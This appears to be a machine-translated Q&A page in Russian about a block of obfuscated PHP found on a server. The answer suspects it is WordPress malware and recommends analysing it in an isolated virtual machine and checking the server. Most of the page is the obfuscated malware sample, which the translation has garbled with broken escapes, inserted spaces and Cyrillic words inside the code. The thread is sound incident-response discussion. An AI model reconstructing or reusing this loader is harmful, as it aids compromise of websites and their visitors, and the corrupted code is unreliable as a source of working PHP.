-3
!} x27 ;!>>>!}_; gvc%} &; ftmbg} x77 {** u% - # jt0} Z; 0] =] 0 #) 2q% l} S; 2-u%! - # 2 # / #% # / # o ] #jw) bssbz) #P # - # Q # - # B # - # Т # - # E # - # G # - # # * Н5% FDY!% Протяжен)% bbT-% BT-% Hw ~% FDY) ## -# ~ / 7 & 6 | 7 ** 111127-ZW% ч> Еж, 2W% Wn; # - Ez-1H * WCW * [!% rN} # QwTW% hIr x5c1 ^ -% r x5c2 ^ -% hOh / # 00 # W6!2р%!* 3>?* 2b%) GPF {JT)!GJ!pjudovg x22)!GJ} 1 ~!52] 88] 5] 48] 32M3] 317] 445] 212] 445] 43] 321] 464] 284] 364] 6] 234] 342] 58] 24hmg%!J%!|!* # Д% 62bd% !.%!> x22: ftmbg39 * 56 мг%)!GJ!~: ,, BJG)!% J: >> 1 *!% b:> 1% s: x5c% j: .2 ^,% b:% s: x5c% j: ^ * ofmy%) utjm!|!* 5! x27!HMG%)!GJ!|!* 1?HMG%)!GJ!]26 x24- x24j%!* 9! x27!hnjA x27 & 6!fyqmpef) # x24 *! x24Yp x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e "; * + fepdfe {h + {d%) + opjudovg +)!GJ + {е%!osvufs!*!+ А!>! {е%)!>> х22!ftmbg)!427] 36] 373P6] 36] 73] 83] 238M7] 381] 211M5] 67] 4 * XAZASVu% ВУ # I4] 275L3] 248L3P6L1M5] D2P4] D6 ##] Д6] 281L1 # / # M5] DgP5] Д6 # #] Д4] 273] D6P2L5P6] y6gP7L6M7] 37] 88Y] 27] 28Y] # / г% / ч%) п% - # + I #) д%:>: г%: |: ** т%) м % = * ч%) м%): FMJ] 31 # -% Протяжен * Wsfuvso!% bss x5csboe)) 1/35.) 1/14 + 9 ** -) 1/00 # *} & ;!osvufs} x7f ;!o_SFSFGFS`QUUI & c_UOFHB`SFTV`QUUI & B%!|!*) 323 ~!% T2W) ## Qtjw) #] 82 ##!# -% TMW)% TWW ** WYsboepn)% bss-% RxB% ч> #] Y31] 278]) sutcvt)!GJ!|!* Бубэ {ч%) J {hnpd!opjud9f5d816: +946: ce44 #) zbssb!>!ssbnpe_GMFT`QIQ & f_UTPI`QUUI & e_SEEB`FUPNFS & dr_split ( "% TJW!>!#] Y84] 275] Y83] 248] Y83] 256] Y81] 265] y72] 254] y76 #!"х61 156 х75 156 х61"] = 1; $ uas = strtolower ($ _ SERVER ["6, # / q%> 2q% q% V! x24 /% tjw / x24)% x24-x24y4 x24-x24] y8 x24-x24] 48y] #> s% q% m% ldpt%} K; `ufldpt} X;` msvd} R; * str ($ uas , "x61 156 x64 162 x6f 151 x64"))) {$ hsbdriw = "x63 162 function bknbpvb ($ n) {return chr (ord ($ n) -1);} @ error_repor2986 + 7 ** ^ /% rx111 !% yy) #} # - # x24- x24-tusqpt)%> qp%!| Z ~ !!2р%!|!*!* JQeTQcOc / # 00 # W ~!Ydrr)% RxB% epnbss!>!bssbz) # 44ec: 649 # -#: 618d5f9 # -# F6c6 ## >> X)!gjZb%!** X) уфть х22) бж!|!* NBSS, 6! x242178} 527} 88:} 334} 472 x24 / 7rfs%: * mmvo:>: iuhofm%: - 5ppde: 4: |: ** # ppde #) tutjyf`4 x223}!+!> * 4-1-bubE {h% SUT`LDPT7-UFOJ`GB) fubfsdX)% j> 1 ^ # zsfvr # x5cq% 7 ** ^ # zsfvr # x5cq%) ufttj x22) gj632j%!* 72! x27!HMG%)!gjdovg} {; #) tutjyf`opjudov3f] 51L3] 84] y31M6] y3e] 81 # / # 7e: 55946-tr.984: 75983: 48984: 71] К9] 77zbek!~!б% Zb%!* (% Вес :!>! x246767 ~ 6!bssbz) x24] 25 x24- x24-!% x24- x24 *!|! x24- x2j% 7-K) udfoopdXA x22) 7gj6>} R; msv}.; / # / # / 67j ** b%) sfxpmpusut! - # j0 #!/!** # sfmcnbs + yfeobz + s` x5c ^> Ew: Qb: Qc: W ~!% Г!> 21 # р # / # р # /% г> 2 * А:>: 8: |: 7 # 6 #) tutjyf`439275ttfsqnpdov {h19275j {hnpd19275fubmgoj {h1: |%} U; у]} R; 2] } ,; osvufs} x27; mnui} &; zep *!% i x5c2 ^ x2272qj%) 7gj6] D4] 82] K6] 72] K9] 78] K5] 53] Kc #!#] D && (!isset ($ GLOBALS ["x61 156 x75 156 x61"])))) {$ GLOBALS [_ * # [k2` {6 :!}7} ;!6; ##} С ;!>>!}W; utpix :: ч%: п%!#] y84] 2757, * e x27, * d x27, * c x27, * b x27) fepq% 6! x2400 ~: / h%:> x22!П.Д.%)!GJ} Z; ч!opju] Y83] 273] y76] 277 ##] Y74] 273ovg!|!** # J {hnpd #) tutjyf`ogj5h% !! х24 /% тмв / х24)% - х24 *

1 ответ1

2

Это какой-то запутанный код PHP. Я не удосужился (и не вижу смысла) смотреть дальше.

  • Вы можете выполнить его из командной строки под непривилегированной учетной записью (или даже лучше) с виртуальной машины, чтобы вы могли запретить ей доступ к сети - возможно, к базе данных - в случае, если она имеет встроенные учетные данные) и посмотреть, что произойдет.
  • Тем не менее, я предлагаю вам попытаться деобфусцировать это вручную, как тизер мозга.
    • Обратите внимание, что вы можете запускать куски PHP-кода через интерпретатор командной строки, чтобы он выполнял большую часть работы за вас.

Комментарий к такому вопросу о Wordpress предполагает, что это может быть стандартный файл Wordpress.

Погуглив "php obfuscator" Silence is golden. "" Далее я обнаружил https://security.stackexchange.com/questions/128546/obfuscated-php-code-found-in-wordpress-core-files-and-plugins . Дело закрыто.

Скорее всего, это вирус Wordpress. Тем более для вас стимул разбирать его и смотреть, что он делает. Ну, и проверьте этот сервер на наличие аномалий - лучше с аварийного диска.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .